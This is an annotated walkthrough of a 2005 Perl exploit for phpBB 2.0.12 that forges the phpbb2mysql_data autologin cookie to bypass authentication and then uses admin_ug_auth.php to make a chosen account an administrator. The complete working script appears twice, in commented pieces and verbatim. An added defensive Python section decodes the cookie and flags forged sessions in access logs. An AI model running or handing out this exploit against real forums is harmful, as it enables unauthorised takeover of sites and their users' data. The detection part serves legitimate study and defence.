phpBB 2.0.12 Authentication Bypass via Session Manipulation

What this paper is
This paper details an exploit for phpBB version 2.0.12 that allows an attacker to bypass authentication and grant administrative privileges to a specified user. The vulnerability lies in how the autologinid cookie is handled, allowing an attacker to manipulate session data to impersonate an administrator or gain administrative access.
Simple technical breakdown
The exploit works by crafting a specific cookie that, when sent to a vulnerable phpBB installation, tricks the server into believing the user has administrative rights. This is achieved by manipulating the phpbb2mysql_data cookie, which stores user session information. The script then uses this manipulated cookie to access the administrative control panel and assign administrator privileges to a target user.
Complete code and payload walkthrough
The provided Perl script is designed to automate the exploitation process. Let's break down its components:
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

Shebang and Comments:
- #!/usr/bin/perl -w: Specifies Perl as the interpreter and enables warnings (-w) for better debugging.
- The comments explain the script's purpose: exploiting a session autologin vulnerability in phpBB <= 2.0.12 through the autologinid variable. They also mention the prerequisite of registering the target user beforehand and credit the author.
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}

Argument Handling:
- if (@ARGV < 3): Checks whether fewer than three command-line arguments were provided.
- print q(...): If so, prints a usage message listing the required parameters: [site], [phpbb folder], [username], and an optional [proxy].
- exit;: Terminates the script when arguments are missing.
use strict;
use LWP::UserAgent;

Module Inclusion:
- use strict;: Enforces strict variable declaration and other good coding practices.
- use LWP::UserAgent;: Imports the LWP::UserAgent module, which is used for making HTTP requests.
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;

Variable Assignment:
- my $host = $ARGV[0];: Assigns the first command-line argument (the website domain) to $host.
- my $path = $ARGV[1];: Assigns the second argument (the phpBB installation path) to $path.
- my $user = $ARGV[2];: Assigns the third argument (the username to grant admin rights) to $user.
- my $proxy = $ARGV[3];: Assigns the fourth argument (the optional proxy address) to $proxy.
- my $request = "http://"; $request .= $host; $request .= $path;: Constructs the base URL of the phpBB installation.
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);

Cookie Manipulation:
- use HTTP::Cookies;: Imports the HTTP::Cookies module for managing cookies.
- my $browser = LWP::UserAgent->new ();: Creates a new LWP::UserAgent object.
- my $cookie_jar = HTTP::Cookies->new( );: Creates a new cookie jar.
- $browser->cookie_jar( $cookie_jar );: Associates the cookie jar with the user agent.
- $cookie_jar->set_cookie(...): This is the core of the exploit. It sets a cookie named phpbb2mysql_data for the target host.
- The value "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D" is a URL-encoded string. Decoded, it is a PHP serialized array: a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}.
- When phpBB unserializes this data it sees:
  - autologinid set to 1 (boolean true), which is likely a flag to enable autologin or a similar session persistence mechanism.
  - userid set to "2". This is crucial. By setting a low userid (such as '2') and manipulating the autologinid, the script attempts to trick the server into treating the request as a valid, potentially administrative session. The actual user ID of the target user is fetched later; the '2' here is a placeholder, and the exploit relies on the server not strictly validating it against the current session.
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}

Proxy Configuration:
- if ( defined $proxy): Checks whether a proxy argument was provided.
- $proxy =~ s/(http:\/\/)//eg;: Strips any leading "http://" from the proxy string so that only host and port remain.
- $browser->proxy("http" , "http://$proxy");: Configures the LWP::UserAgent to send HTTP requests through the specified proxy.
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}

Initial Connection and Vulnerability Check:
- The print statements report the host, path and (if set) the proxy being used.
- my $response = $browser->get($request);: Makes a GET request to the base phpBB URL with the crafted cookie attached.
- die "Error: ", $response->status_line unless $response->is_success;: Exits if the request fails.
- if($response->content =~ m/phpbbprivmsg/): Checks the response body for the string "phpbbprivmsg". This string is likely present on a page rendered for authenticated users (or users with a valid session, even a manipulated one), so finding it indicates the forum is likely vulnerable.
- If "phpbbprivmsg" is not found, the script prints "Sorry... Not vulnerable" and exits.
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;

Retrieving User ID:
- $response->content =~ /sid=([\w\d]*)/; my $sid = $1;: Extracts the session ID (sid) from the previous response. This sid is likely taken from a link or hidden form field on the page.
- $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";: Appends the path of the user/group permissions administration page, including the extracted sid.
- The script then sends a POST request to this admin page.
- [ 'username' => $user, 'mode' => 'edit', 'mode' => 'user', 'submituser' => 'Look+up+User' ]: The form parameters of the POST request. The goal is to look up the target $user by username. Note that 'mode' is given twice ('edit' and 'user'), which is likely a typo or an artifact of how the form submission was constructed; the last value typically overrides earlier ones. The key parameters are 'username' => $user and 'submituser' => 'Look+up+User', which trigger the lookup.
- if ($response->content =~ /name="u" value="([\d]*)"/): After the lookup, the script searches the response for a hidden input field named "u" that carries the numeric user ID.
- my $uid = $1;: If found, the user ID is extracted and stored in $uid.
- If no user ID is found, an error message is printed and the script exits.
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

Granting Administrator Privileges:
- $response = $browser->post(...): A second POST request is made to the same admin_ug_auth.php page.
- [ 'userlevel' => 'admin', 'mode' => 'user', 'adv'=>'', 'u'=> $uid, 'submit'=> 'Submit' ]: The parameters that grant admin rights:
  - 'userlevel' => 'admin': Explicitly sets the user level to 'admin'.
  - 'mode' => 'user': Likely specifies that the action applies to a user.
  - 'adv'=>'': Possibly related to advanced settings; left empty.
  - 'u'=> $uid: The user ID to modify.
  - 'submit'=> 'Submit': Submits the changes.
- die "Error: ", $response->status_line unless $response->is_success;: Exits on error.
- print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";: On success, prints a confirmation message.
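As an added example (not part of the exploit script or of phpBB), the following Python decodes the phpbb2mysql_data cookie analysed in the Cookie Manipulation step and scans web-server access logs for requests that carry a forged autologinid, including the admin_ug_auth.php requests described in the last two steps. Two assumptions are labelled in the code: that an autologinid issued by phpBB 2.0.12 is either empty or a 32-character hex digest, so any other serialized type (the exploit's b:1) cannot have come from the forum itself; and that the server logs the Cookie request header as an extra quoted field at the end of the combined log format. The log lines, IP addresses and sid are constructed for the example.

```python
"""Added defender-side example (not code from the exploit or from phpBB):
decode phpbb2mysql_data and flag a forged autologinid in web-server logs."""
import re
from urllib.parse import unquote


def php_unserialize(data: str):
    """Minimal PHP unserialize() for s/b/i/a types. Every value is returned as
    a (type_tag, value) pair, so b:1 and s:1:"1" remain distinguishable."""
    pos = 0

    def take(pattern):
        nonlocal pos
        m = re.compile(pattern).match(data, pos)
        if m is None:
            raise ValueError(f"malformed serialized data at offset {pos}")
        pos = m.end()
        return m

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        if tag == 's':
            length = int(take(r's:(\d+):"').group(1))
            value = data[pos:pos + length]
            if data[pos + length:pos + length + 2] != '";':
                raise ValueError(f"string length mismatch at offset {pos}")
            pos += length + 2
            return ('s', value)
        if tag == 'b':
            return ('b', take(r'b:([01]);').group(1) == '1')
        if tag == 'i':
            return ('i', int(take(r'i:(-?\d+);').group(1)))
        if tag == 'a':
            count = int(take(r'a:(\d+):\{').group(1))
            members = {}
            for _ in range(count):
                _key_tag, key = parse()  # PHP array keys are strings or ints
                members[key] = parse()
            take(r'\}')
            return ('a', members)
        raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")

    return parse()


def decode_phpbb_cookie(raw_cookie_value: str) -> dict:
    """URL-decode phpbb2mysql_data into {key: (php_type, value)}."""
    tag, members = php_unserialize(unquote(raw_cookie_value))
    if tag != 'a':
        raise ValueError("phpbb2mysql_data must unserialize to an array")
    return members


def autologinid_is_forged(session: dict) -> bool:
    """Assumption (see lead-in): phpBB 2.0.12 issues autologinid as either an
    empty string or a 32-char lowercase hex digest. Any other serialized type
    or shape, such as the exploit's b:1, was hand-crafted by the client."""
    if 'autologinid' not in session:
        return False
    tag, value = session['autologinid']
    return tag != 's' or not (value == '' or re.fullmatch(r'[0-9a-f]{32}', value))


# Assumption: combined log format with the Cookie header as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} \S+ '
    r'"[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)
COOKIE_RE = re.compile(r'(?:^|;\s*)phpbb2mysql_data=([^;]*)')


def scan_log(text: str) -> list:
    """Return (ip, reason, url) for each request whose phpbb2mysql_data cookie
    is forged or unparseable; hits on the admin panel are called out."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        c = COOKIE_RE.search(m['cookie']) if m else None
        if c is None:
            continue
        try:
            forged = autologinid_is_forged(decode_phpbb_cookie(c.group(1)))
        except ValueError:
            forged = True  # phpBB never issues a cookie that does not parse
        if forged:
            reason = 'forged autologinid'
            if '/admin/' in m['url']:
                reason += ' used against admin panel'
            findings.append((m['ip'], reason, m['url']))
    return findings


# Constructed sample log (documentation IPs, made-up sid): the walkthrough's
# cookie from a libwww-perl client, a genuine-looking session, no cookie at all.
FORGED = ('a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B'
          's%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D')
GENUINE = ('a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22d41d8cd98f00b2'
           '04e9800998ecf8427e%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D')
SAMPLE_LOG = f'''
198.51.100.7 - - [21/Mar/2005:10:01:02 +0000] "GET /forum/ HTTP/1.1" 200 5120 "-" "libwww-perl/5.803" "phpbb2mysql_data={FORGED}"
198.51.100.7 - - [21/Mar/2005:10:01:03 +0000] "POST /forum/admin/admin_ug_auth.php?mode=user&sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 2048 "-" "libwww-perl/5.803" "phpbb2mysql_data={FORGED}"
203.0.113.5 - - [21/Mar/2005:10:05:00 +0000] "GET /forum/index.php HTTP/1.1" 200 7000 "-" "Mozilla/5.0" "phpbb2mysql_data={GENUINE}"
203.0.113.9 - - [21/Mar/2005:10:06:00 +0000] "GET /forum/index.php HTTP/1.1" 200 7000 "-" "Mozilla/5.0" "-"
'''
```

Run over the constructed log, scan_log(SAMPLE_LOG) returns two findings for 198.51.100.7, the second marking the POST to the admin panel; the genuine-looking session and the cookieless request produce none. Tagging every unserialized value with its PHP type is the point of the decoder: b:1 and s:1:"1" both print as 1 but are different values to the application, so the detector treats any non-string autologinid as forged regardless of how the forum itself compares it.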
# milw0rm.com [2005-03-21]

Exploit Source: Indicates where the exploit was published (milw0rm.com, 2005-03-21).
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]